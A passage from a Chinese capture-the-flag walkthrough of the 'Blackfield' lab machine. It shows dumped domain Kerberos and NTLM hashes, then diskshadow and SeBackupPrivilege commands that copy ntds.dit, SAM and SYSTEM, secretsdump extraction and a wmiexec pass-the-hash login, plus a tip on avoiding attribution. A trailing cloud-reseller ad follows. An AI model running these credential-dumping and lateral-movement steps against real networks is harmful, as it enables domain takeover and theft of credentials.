            BLACKFIELD.local\BLACKFIELD946435:des-cbc-md5:e310fecb7fe5ab80
            BLACKFIELD.local\BLACKFIELD739227:aes256-cts-hmac-sha1-96:6ff42c3fc2caeec33ae9a3be34fb077033ddde802532718b5163a1550f6d2f6c
            BLACKFIELD.local\BLACKFIELD739227:aes128-cts-hmac-sha1-96:bc2b889ef20ca719e84123f3d0793b1c
            BLACKFIELD.local\BLACKFIELD739227:des-cbc-md5:e65d2a8a4319f2bc
            BLACKFIELD.local\BLACKFIELD827906:aes256-cts-hmac-sha1-96:c959ae94fd71ab6304755ded3d2642f44d94cc6f26f6331a4268814758039ea9
            BLACKFIELD.local\BLACKFIELD827906:aes128-cts-hmac-sha1-96:cc67ae5323a0a1de1fd9b0b7cc7f4316
            BLACKFIELD.local\BLACKFIELD827906:des-cbc-md5:80d63edc233449ce
            BLACKFIELD.local\BLACKFIELD198927:aes256-cts-hmac-sha1-96:5c657d2892c912d1a0b8396a4558233a44fb1e60026443369dabf2c83464bfe4
            BLACKFIELD.local\BLACKFIELD198927:aes128-cts-hmac-sha1-96:f430b1b24dea3632aff073f952ed3541
            BLACKFIELD.local\BLACKFIELD198927:des-cbc-md5:e0839e5dc18907fe
            BLACKFIELD.local\BLACKFIELD169876:aes256-cts-hmac-sha1-96:54e9ccb0cf1702ce46e421eb3a52e17c2346392a714997e536cdd7da74c12fa3
            BLACKFIELD.local\BLACKFIELD169876:aes128-cts-hmac-sha1-96:a920c5187c3d04693d2e143fc1c95056
            BLACKFIELD.local\BLACKFIELD169876:des-cbc-md5:0e98a8043e62c77f
            BLACKFIELD.local\BLACKFIELD150357:aes256-cts-hmac-sha1-96:712ebe0af10922e399e0f6df19e3abafe802cd89134ae0b3473b6a19034515ff
            BLACKFIELD.local\BLACKFIELD150357:aes128-cts-hmac-sha1-96:245a23797a55d4b0703ec0621b1f1903
            BLACKFIELD.local\BLACKFIELD150357:des-cbc-md5:8a688aef9d314aad
            BLACKFIELD.local\BLACKFIELD594619:aes256-cts-hmac-sha1-96:4167db1927eaab68d721286353c9aec5551ce6fa91626a6af4e89fe027652c46
            BLACKFIELD.local\BLACKFIELD594619:aes128-cts-hmac-sha1-96:89c5aa552ed838736a5943d7caf565ad
            BLACKFIELD.local\BLACKFIELD594619:des-cbc-md5:a746922a261a375e
            BLACKFIELD.local\BLACKFIELD274109:aes256-cts-hmac-sha1-96:bb071bdcd862e958bf9aa084d3e4ac95bac984ecbd44e7c42a17b4d46185a3cb
            BLACKFIELD.local\BLACKFIELD274109:aes128-cts-hmac-sha1-96:e1d9ab7359eefc31f913d380af5f2e04
            BLACKFIELD.local\BLACKFIELD274109:des-cbc-md5:ce15b94a9bea5875
            BLACKFIELD.local\BLACKFIELD682949:aes256-cts-hmac-sha1-96:0aa8b9868c52256371ce09f3c98912a5ea894d8cba01848f8e73ff37b1888522
            BLACKFIELD.local\BLACKFIELD682949:aes128-cts-hmac-sha1-96:cc9c530f06e3c9142a3a0048752ee853
            BLACKFIELD.local\BLACKFIELD682949:des-cbc-md5:b9406808f825fdce
            BLACKFIELD.local\BLACKFIELD316850:aes256-cts-hmac-sha1-96:00eb56331abc22f34758470ede0791915de63ecf6284c6d8df6d7021cb5e5591
            BLACKFIELD.local\BLACKFIELD316850:aes128-cts-hmac-sha1-96:27443b918f0b9f28a650d5e5baab0a12
            BLACKFIELD.local\BLACKFIELD316850:des-cbc-md5:329df8daa7850ed9
            BLACKFIELD.local\BLACKFIELD884808:aes256-cts-hmac-sha1-96:08581ba13da53426d45818a705ff470accd60fb30f9ca201125556e25e1c11fc
            BLACKFIELD.local\BLACKFIELD884808:aes128-cts-hmac-sha1-96:2c1cc66be53975002b8a10ba7dd37322
            BLACKFIELD.local\BLACKFIELD884808:des-cbc-md5:ef25abbcae4667a2
            BLACKFIELD.local\BLACKFIELD327610:aes256-cts-hmac-sha1-96:c434199d6c58cb769909bc83e66a8834b0e1e0f02b8c26625bb2471ff88facc4
            BLACKFIELD.local\BLACKFIELD327610:aes128-cts-hmac-sha1-96:35ceb926dccfce5c15fbbda50d008e4d
            BLACKFIELD.local\BLACKFIELD327610:des-cbc-md5:7938f1bcc1769dfe
            BLACKFIELD.local\BLACKFIELD899238:aes256-cts-hmac-sha1-96:37f8fdc95dbc965b995f4236b4fc74645759eef1d3198dbf0897bb08d8cf10a2
            BLACKFIELD.local\BLACKFIELD899238:aes128-cts-hmac-sha1-96:bcf3bc3b13e1fdb0ec4bddcc7b0bd080
            BLACKFIELD.local\BLACKFIELD899238:des-cbc-md5:a2929770c1ae317a
            BLACKFIELD.local\BLACKFIELD184493:aes256-cts-hmac-sha1-96:062cb1e9a50b5a2191ec01c086c907b65708a007c8a11107d2e0ddadc395b486
            BLACKFIELD.local\BLACKFIELD184493:aes128-cts-hmac-sha1-96:7e8e02200dd5fc04120d5484ffc2a96c
            BLACKFIELD.local\BLACKFIELD184493:des-cbc-md5:808f4afb16c20ef8
            BLACKFIELD.local\BLACKFIELD631162:aes256-cts-hmac-sha1-96:ab9dabd14ba6bec707675abe674014432e4d7d8eea402ce0ed6e945c4bce7dd7
            BLACKFIELD.local\BLACKFIELD631162:aes128-cts-hmac-sha1-96:31af82af71d10793edf4e2f2accfca37
            BLACKFIELD.local\BLACKFIELD631162:des-cbc-md5:296d46ba5b0d7308
            BLACKFIELD.local\BLACKFIELD591846:aes256-cts-hmac-sha1-96:eeb42d345c2584b2663f1f01f9f4d46c6ac7264f5a79b17e690c91159e02c097
            BLACKFIELD.local\BLACKFIELD591846:aes128-cts-hmac-sha1-96:86a127572b2ea081b20bb899c316940d
            BLACKFIELD.local\BLACKFIELD591846:des-cbc-md5:9b7323cd79f43432
            BLACKFIELD.local\BLACKFIELD896715:aes256-cts-hmac-sha1-96:738d933768e658d591bd99989a70a057b5202d505a96fa3c59e7e76d40cc00ac
            BLACKFIELD.local\BLACKFIELD896715:aes128-cts-hmac-sha1-96:dcfedcc4a4852651cad7e2d0dfae6914
            BLACKFIELD.local\BLACKFIELD896715:des-cbc-md5:437349b52c760b46
            BLACKFIELD.local\BLACKFIELD500073:aes256-cts-hmac-sha1-96:d892427e551e891ae29f2e7e0590d65e9cb6e6b44a218a76859e64cf5425376b
            BLACKFIELD.local\BLACKFIELD500073:aes128-cts-hmac-sha1-96:52e895eb23655f03a982dbd4a557d3f4
            BLACKFIELD.local\BLACKFIELD500073:des-cbc-md5:e929d9b0d919548f
            BLACKFIELD.local\BLACKFIELD584113:aes256-cts-hmac-sha1-96:725c74e4b6ad419392799a5a66f37dffe4217e900bce020b855d0e9a49ec6edd
            BLACKFIELD.local\BLACKFIELD584113:aes128-cts-hmac-sha1-96:391458bdc18cc4e28eaa96d5f5676ffc
            BLACKFIELD.local\BLACKFIELD584113:des-cbc-md5:403d4cbc52cb2ac7
            BLACKFIELD.local\BLACKFIELD204805:aes256-cts-hmac-sha1-96:6a175c0f2bcfe9bd463516f3622a24af0cf28ace949263396c55320c5355bae0
            BLACKFIELD.local\BLACKFIELD204805:aes128-cts-hmac-sha1-96:3bd99c88503b376715d452ca357348c5
            BLACKFIELD.local\BLACKFIELD204805:des-cbc-md5:68262625f17f4602
            BLACKFIELD.local\BLACKFIELD842593:aes256-cts-hmac-sha1-96:f6e0f65387a1359d59e3bd074654863a1359e7587d31dfb93546df6c3321b9ba
            BLACKFIELD.local\BLACKFIELD842593:aes128-cts-hmac-sha1-96:e2790dba83ec522072c4437cfb6328fe
            BLACKFIELD.local\BLACKFIELD842593:des-cbc-md5:0d52d3b60dd52a49
            BLACKFIELD.local\BLACKFIELD397679:aes256-cts-hmac-sha1-96:f640ed054becbef667f218f5282a4e21bf17e6f0d4d907c6e1c284d251f14059
            BLACKFIELD.local\BLACKFIELD397679:aes128-cts-hmac-sha1-96:fd042044cd5723ed8995d0c788c2722a
            BLACKFIELD.local\BLACKFIELD397679:des-cbc-md5:867ae0f4e98cc207
            BLACKFIELD.local\BLACKFIELD842438:aes256-cts-hmac-sha1-96:67dd702c476f074c8b45f3ce3bac69d6010e1b58a6ea17c346838c8c48876d7c
            BLACKFIELD.local\BLACKFIELD842438:aes128-cts-hmac-sha1-96:9c41ef01eebb39debcad9a2ca88edd12
            BLACKFIELD.local\BLACKFIELD842438:des-cbc-md5:317afe915bf16132
            BLACKFIELD.local\BLACKFIELD286615:aes256-cts-hmac-sha1-96:1a17eecddb381a6477198a0ba8eed2316a68872bd7bb806aa84d954549db5eb1
            BLACKFIELD.local\BLACKFIELD286615:aes128-cts-hmac-sha1-96:2f2b673a29d183071ba1931474beb499
            BLACKFIELD.local\BLACKFIELD286615:des-cbc-md5:2fcb57b6045e0154
            BLACKFIELD.local\BLACKFIELD224839:aes256-cts-hmac-sha1-96:5f14d20ce9ca6e5caf04dd34ebf795b4c9c9015d5d8520b704cd9c8254634538
            BLACKFIELD.local\BLACKFIELD224839:aes128-cts-hmac-sha1-96:b27e2b48b724cfe6e3384ee78b70ec7f
            BLACKFIELD.local\BLACKFIELD224839:des-cbc-md5:8a0d0dbaab1c5223
            BLACKFIELD.local\BLACKFIELD631599:aes256-cts-hmac-sha1-96:a25d189f64be5f209d1e00f6bfe3e948242846d01aa0dfe8ccaef2e8c4582869
            BLACKFIELD.local\BLACKFIELD631599:aes128-cts-hmac-sha1-96:81af84187f428880ff8fb959ed58caae
            BLACKFIELD.local\BLACKFIELD631599:des-cbc-md5:c7cdd32c70529e0b
            BLACKFIELD.local\BLACKFIELD247450:aes256-cts-hmac-sha1-96:834890d333df4218ed839d74762e388d463ba8e9a7cbed86925efae6c0d2e7e3
            BLACKFIELD.local\BLACKFIELD247450:aes128-cts-hmac-sha1-96:401e77570d0d12193f4a121c93964450
            BLACKFIELD.local\BLACKFIELD247450:des-cbc-md5:6197df13d52fb9fe
            BLACKFIELD.local\BLACKFIELD290582:aes256-cts-hmac-sha1-96:5935dd366aaaa402d77ca49f09cf0ecc18f66a04ec485f44c06d437646c437c3
            BLACKFIELD.local\BLACKFIELD290582:aes128-cts-hmac-sha1-96:643eab53ea5d8311109f3664d4d6b678
            BLACKFIELD.local\BLACKFIELD290582:des-cbc-md5:cb6d971ca7bfb3e9
            BLACKFIELD.local\BLACKFIELD657263:aes256-cts-hmac-sha1-96:405c84ebf75c8107aa9f220714e069d75ede898981ed9291e8dcff2411f68363
            BLACKFIELD.local\BLACKFIELD657263:aes128-cts-hmac-sha1-96:8812b12ac284c9fcc26a84c363121e56
            BLACKFIELD.local\BLACKFIELD657263:des-cbc-md5:62b6cb490737d992
            BLACKFIELD.local\BLACKFIELD314351:aes256-cts-hmac-sha1-96:37b8c503f9b799c3ca4fff3abfd1ad9476f0d1cbeefa15eb03aaa5fd91b23067
            BLACKFIELD.local\BLACKFIELD314351:aes128-cts-hmac-sha1-96:6ef4e5b0c691e879e4ba7a38aebdb7d0
            BLACKFIELD.local\BLACKFIELD314351:des-cbc-md5:6ddf5e3b524c3440
            BLACKFIELD.local\BLACKFIELD434395:aes256-cts-hmac-sha1-96:0822ac211e21f9b9bc6bc79c2797e40b250efb3a1f1311a8613897a15a96c74c
            BLACKFIELD.local\BLACKFIELD434395:aes128-cts-hmac-sha1-96:eee739299418891c460785de2aecc24b
            BLACKFIELD.local\BLACKFIELD434395:des-cbc-md5:9dbad3bac76ea47c
            BLACKFIELD.local\BLACKFIELD410243:aes256-cts-hmac-sha1-96:6e58590ae14f2a4f9ccdbac2340362953a085091396f01acbcf60de5fbcc68e1
            BLACKFIELD.local\BLACKFIELD410243:aes128-cts-hmac-sha1-96:b6eee2069b32d5e67e949e3be3c8a777
            BLACKFIELD.local\BLACKFIELD410243:des-cbc-md5:c1b31026524cb51a
            BLACKFIELD.local\BLACKFIELD307633:aes256-cts-hmac-sha1-96:61031b3c8066eb1eb0a3d096d4550b9c47bf174519e98da7c9bd17847453e178
            BLACKFIELD.local\BLACKFIELD307633:aes128-cts-hmac-sha1-96:334193f501c5c7d32d8426baa7868cee
            BLACKFIELD.local\BLACKFIELD307633:des-cbc-md5:a8fe431a8f75ec83
            BLACKFIELD.local\BLACKFIELD758945:aes256-cts-hmac-sha1-96:7330473ca64e419dfeb9297fd543f1d1785c8700c97a4b7ab5a6bd5aa2edaff6
            BLACKFIELD.local\BLACKFIELD758945:aes128-cts-hmac-sha1-96:8af64f8ff365307a77dba35969cd7875
            BLACKFIELD.local\BLACKFIELD758945:des-cbc-md5:8534f176b3bcef58
            BLACKFIELD.local\BLACKFIELD541148:aes256-cts-hmac-sha1-96:369abcb0f58973b1b46a69bc82f81e68002d25d466f8ef8d19aca5e9dc0b46dd
            BLACKFIELD.local\BLACKFIELD541148:aes128-cts-hmac-sha1-96:94fa199c08f621aaa047cc86dac7cc57
            BLACKFIELD.local\BLACKFIELD541148:des-cbc-md5:897cfe7cc4fb4c3b
            BLACKFIELD.local\BLACKFIELD532412:aes256-cts-hmac-sha1-96:2b32e91d933cd2270e2eb471140292bfbbb11dc3111dc232010a134eb27861dd
            BLACKFIELD.local\BLACKFIELD532412:aes128-cts-hmac-sha1-96:477508b8191ed5fa1eb3f192a4246e2c
            BLACKFIELD.local\BLACKFIELD532412:des-cbc-md5:e06ed3baa838b375
            BLACKFIELD.local\BLACKFIELD996878:aes256-cts-hmac-sha1-96:ac514e1a27e4ae34ee5e5b480bd18a9fd4b7b65b28548aa5d3897a9ee47a064f
            BLACKFIELD.local\BLACKFIELD996878:aes128-cts-hmac-sha1-96:bcb3f1507fdb53c4bcd6086f229277c1
            BLACKFIELD.local\BLACKFIELD996878:des-cbc-md5:10a83b7a70d3ae52
            BLACKFIELD.local\BLACKFIELD653097:aes256-cts-hmac-sha1-96:dbed48fb9700ba332ba3983040d63c98a211e42bc474c866752854c238e32d0e
            BLACKFIELD.local\BLACKFIELD653097:aes128-cts-hmac-sha1-96:34ac05936b552fdd5b14a0d83365890d
            BLACKFIELD.local\BLACKFIELD653097:des-cbc-md5:4907d55dcdb6797c
            BLACKFIELD.local\BLACKFIELD438814:aes256-cts-hmac-sha1-96:3d1020b700e7467a545d8affe0cb8c9a9fb6caf373ebd4b44044fafe240436b0
            BLACKFIELD.local\BLACKFIELD438814:aes128-cts-hmac-sha1-96:64944896ddb3058f392a3d85c0badaa8
            BLACKFIELD.local\BLACKFIELD438814:des-cbc-md5:1902ef08f45de95e
            svc_backup:aes256-cts-hmac-sha1-96:20a3e879a3a0ca4f51db1e63514a27ac18eef553d8f30c29805c398c97599e91
            svc_backup:aes128-cts-hmac-sha1-96:139276fff0dcec3c349cb8b563691d06
            svc_backup:des-cbc-md5:981a38735d7c32d6
            BLACKFIELD.local\lydericlefebvre:aes256-cts-hmac-sha1-96:82e6a43bb06f136b82894d444d6d877247bc2c7739661474c8a6de61779f7446
            BLACKFIELD.local\lydericlefebvre:aes128-cts-hmac-sha1-96:5240eb187f56791949a6b5dd6d701647
            BLACKFIELD.local\lydericlefebvre:des-cbc-md5:134a986da801c85d
            PC01$:aes256-cts-hmac-sha1-96:2ab654a0d622b58a26eccc0bd3bfefac1229740a662e3f28218188961c05c338
            PC01$:aes128-cts-hmac-sha1-96:b907be19da08ea29a4b08bf332242308
            PC01$:des-cbc-md5:7f10169d5d94f4ad
            PC02$:aes256-cts-hmac-sha1-96:f192ef5f1f01d15461430347252bb5c265b3cda8d9b576408e6d1142e091ad61
            PC02$:aes128-cts-hmac-sha1-96:b0a46a82f0f2633fbb939c87d65cb806
            PC02$:des-cbc-md5:8652d5e94a0d5710
            PC03$:aes256-cts-hmac-sha1-96:0eb6bee6a0857e06121b691fdc9342af71784a48490c72b19b53fd03e051a93b
            PC03$:aes128-cts-hmac-sha1-96:b6381d242582d1f855113f8b72676736
            PC03$:des-cbc-md5:235ea8261538add6
            PC04$:aes256-cts-hmac-sha1-96:30cb9e83e597fc98559f5b7cca79e7fd17fea6931a748ed4de94ad88f79212c6
            PC04$:aes128-cts-hmac-sha1-96:dafc3d95e41801a6e1f2a30fd932013e
            PC04$:des-cbc-md5:1a16542aa86704e3
            PC05$:aes256-cts-hmac-sha1-96:1dba69f739ba6a609f8df979d90ae59df616f7f8127585b92afedb21aa212501
            PC05$:aes128-cts-hmac-sha1-96:e1205fdaa1131901720be105961aa239
            PC05$:des-cbc-md5:9badf14f156ef8bf
            PC06$:aes256-cts-hmac-sha1-96:a120444b408016aa373fb8bba058f814869f6e56035e3cf56c46c9aaed0347ff
            PC06$:aes128-cts-hmac-sha1-96:45cab44ee0d77727a6f4385392af0343
            PC06$:des-cbc-md5:9ee392d349c2fba1
            PC07$:aes256-cts-hmac-sha1-96:c16abbc36ac90d4494a4978edbec0d6771b4c16ebea4de6f9c542a2f4d1990e8
            PC07$:aes128-cts-hmac-sha1-96:c2a17876db049baff303d6de3b243fe4
            PC07$:des-cbc-md5:a23e2c430e516119
            PC08$:aes256-cts-hmac-sha1-96:75639f6fb140359edb164f2f658ad98f956b00b6db7792dc34231ec2d9ab58a4
            PC08$:aes128-cts-hmac-sha1-96:ee1e13e5f1823ebf0b41edbab047e8ba
            PC08$:des-cbc-md5:c8f18f2a401fb598
            PC09$:aes256-cts-hmac-sha1-96:62531bece543149b915656019a7d0299a812ce2b256e7f07fced3d84edfcd29d
            PC09$:aes128-cts-hmac-sha1-96:7cd041db74336675dea6d9704f8a432e
            PC09$:des-cbc-md5:7fcb869d4373ef97
            PC10$:aes256-cts-hmac-sha1-96:d619da2d51bc23fb88e917c5d45407ae406478262f963519b08b883a993ca873
            PC10$:aes128-cts-hmac-sha1-96:56c45edbe77b96b7903bc1f3bf5c71ac
            PC10$:des-cbc-md5:ce7a31d0d368bff7
            PC11$:aes256-cts-hmac-sha1-96:7ff03e37e07a863ac2f4bae29108e4c231dd1d91b01890f377d3263abe69cc61
            PC11$:aes128-cts-hmac-sha1-96:cf4217c00d17225191d52d7fea230e8d
            PC11$:des-cbc-md5:461fb0794ab64a3d
            PC12$:aes256-cts-hmac-sha1-96:5c78d2c05bd1d0ba0fc83acbfa72db66f8f93edc62fd66e63ab464b0b375b0a1
            PC12$:aes128-cts-hmac-sha1-96:b56b48bb51646c992c300ed8f9b4042f
            PC12$:des-cbc-md5:9e160b107c2c920b
            PC13$:aes256-cts-hmac-sha1-96:98ab60128d548dbb9b3383b477a55bd466ab4127b01bb0d2629505c6d0e93865
            PC13$:aes128-cts-hmac-sha1-96:0d4e1a5f00bf9933cc1045fd5c61b17a
            PC13$:des-cbc-md5:bfc73b8602d5ab2c
            SRV-WEB$:aes256-cts-hmac-sha1-96:090ad36e547c20ff359787a27d452243ab3e9ef4b54595add458fbd265e6c103
            SRV-WEB$:aes128-cts-hmac-sha1-96:063e5e2795292318208f411f8ce0797e
            SRV-WEB$:des-cbc-md5:b580c4c2bc0b19d6
            SRV-FILE$:aes256-cts-hmac-sha1-96:eae9659f47e401ba621fe838cc590494d13eb75f3140c366301222356a200f65
            SRV-FILE$:aes128-cts-hmac-sha1-96:44da7f10383facd38df5713bc4259e69
            SRV-FILE$:des-cbc-md5:f47cc238c1ce9791
            SRV-EXCHANGE$:aes256-cts-hmac-sha1-96:04268f211f13d2f617f68ce89e795e360a01efb0bd1645e10853f4fdc3096a65
            SRV-EXCHANGE$:aes128-cts-hmac-sha1-96:eb62e53de31dc30bcefe16e89289efff
            SRV-EXCHANGE$:des-cbc-md5:f162aeb3da497aab
            SRV-INTRANET$:aes256-cts-hmac-sha1-96:bc6ddf66d2027c2b9f4b921726d53032cad3e14efd5291c114f1ae76547be9a6
            SRV-INTRANET$:aes128-cts-hmac-sha1-96:54416d5a7209a9bb741740834dddc7ad
            SRV-INTRANET$:des-cbc-md5:4579ce9240895dae
            [*] Cleaning up... 

ntds卷影提权另一种手法

    cd到C:\windows\temp目录下
    工具下载:
            https://github.com/giuliano108/SeBackupPrivilege
            需要C#环境自己进行编译需要注意的是如果是护网中使用到该工具请不要再本机进行编译防止带上本机信息被溯源到
            需要的dll:
                    SeBackupPrivilegeUtils.dll   
                    SeBackupPrivilegeCmdLets.dll
    创建666.txt并填写以下内容:
            set context persistent nowriters
            add volume c: alias temp
            create
            expose %temp% h:
            exit
    Evil-WinRM upload上传并执行后的回显:
           *Evil-WinRM* PS C:\windows\temp> diskshadow /s 666.txt
            Microsoft DiskShadow version 1.0
            Copyright (C) 2013 Microsoft Corporation
            On computer:  DC01,  1/13/2023 5:19:51 PM

            -> set context persistent nowriters
            -> add volume c: alias temp
            -> create
            Alias temp for shadow ID {8ad40ce7-2615-4bec-9f4a-25ab2a63fe41} set as environment variable.
            Alias VSS_SHADOW_SET for shadow set ID {8b286001-623a-4ae0-a887-064d85a4b0f5} set as environment variable.

            Querying all shadow copies with the shadow copy set ID {8b286001-623a-4ae0-a887-064d85a4b0f5}

                    * Shadow copy ID = {8ad40ce7-2615-4bec-9f4a-25ab2a63fe41}               %temp%
                            - Shadow copy set: {8b286001-623a-4ae0-a887-064d85a4b0f5}       %VSS_SHADOW_SET%
                            - Original count of shadow copies = 1
                            - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
                            - Creation time: 1/13/2023 5:19:53 PM
                            - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                            - Originating machine: DC01.BLACKFIELD.local
                            - Service machine: DC01.BLACKFIELD.local
                            - Not exposed
                            - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                            - Attributes:  No_Auto_Release Persistent No_Writers Differential

            Number of shadow copies listed: 1
            -> expose %temp% h:
            -> %temp% = {8ad40ce7-2615-4bec-9f4a-25ab2a63fe41}
            The shadow copy was successfully exposed as h:\.
            -> exit
     成功创建了C盘的卷映射
    使用SeBackupPrivilege工具复制文件需要用到以下两个dll
            SeBackupPrivilegeUtils.dll
            SeBackupPrivilegeCmdLets.dll       
    利用:
            upload SeBackupPrivilegeUtils.dll                       
            upload SeBackupPrivilegeCmdLets.dll
            import-module .\SeBackupPrivilegeCmdLets.dll            导入dll
            import-module .\SeBackupPrivilegeUtils.dll
            Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
            Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite
    执行完上述命令后发现C:\windows\temp目录下出现了NTDS和SYSTEM文件下载回来后使用下述命令进行hash获取跟上面的方法一样不再赘述。
    下载到本机:
            *Evil-WinRM* PS C:\windows\temp> download SYSTEM
            *Evil-WinRM* PS C:\windows\temp> download NTDS
            hash获取:secretsdump.py -ntds ntds -system system LOCAL
            跟上述一样的手法拿到administrator的hash使用wmiexec登录域控拿到system权限
    注意:
            如果不是域控则没有NTDS.dit文件来获取密码只能下载SAM文件下面是非域控机利用手法:
            Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite
            Copy-FileSeBackupPrivilege h:\windows\system32\config\SECURITY c:\windows\temp\SECURITY -Overwrite
            Copy-FileSeBackupPrivilege h:\windows\system32\config\SAM c:\windows\temp\SAM -Overwrite
    获取hash命令:secretsdump.py -security security -sam sam -system system LOCAL        

使用wmiexec登录域控

     Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d26029b76627770999a4d2b3a9ddc9c5:::
    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
    audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
    support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
    wmiexec命令:
            python3 wmiexec.py -hashes :184fb5e5178480be64824d4cd53b99ee administrator@10.10.10.192

总结

    nmap扫描发现是域控机器且开放了SMB端口通过匿名访问SMB发现了类似于域账号的文件夹使用GetNPUser工具发现域控机器关闭了预认证,尝试使用AS-REP攻击
    爆破之前在SMB发现的域账号成功拿到support账号hash使用john破解出密码使用bloodhound.py用support账号拿到域信息进行本地分析发现support账号对AUDIT2020具有
    ForceChangePassword权限用rpcclient工具滥用权限修改AUDIT2020密码使用AUDIT2020账号并使用CrackMapExec工具进行权限查询发现具有SMB权限
    使用smbclient工具登录SMB发现forensic目录查看内容发现有lsass.zip压缩包使用pypykatz工具提取lsass中NTLM hash拿到administrator和svc_backup账号的hash
    使用使用CrackMapExec验证hash登录发现svc_backup账号可登录administrator账号hash过期无法使用使用evil-winrm工具用svc_backup登录到域控拿到user.flag
    使用whoami /priv命令发现svc_backup账号具有SeBackupPrivilege权限使用SeBackupPrivilege权限滥用进行ntds卷影提权拿到NTDS和SYSTEM文件到本地使用secretsdump.py工具
    进行hash提取拿到administrator域管账号使用wmiexec登录域控拿到system权限。
阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6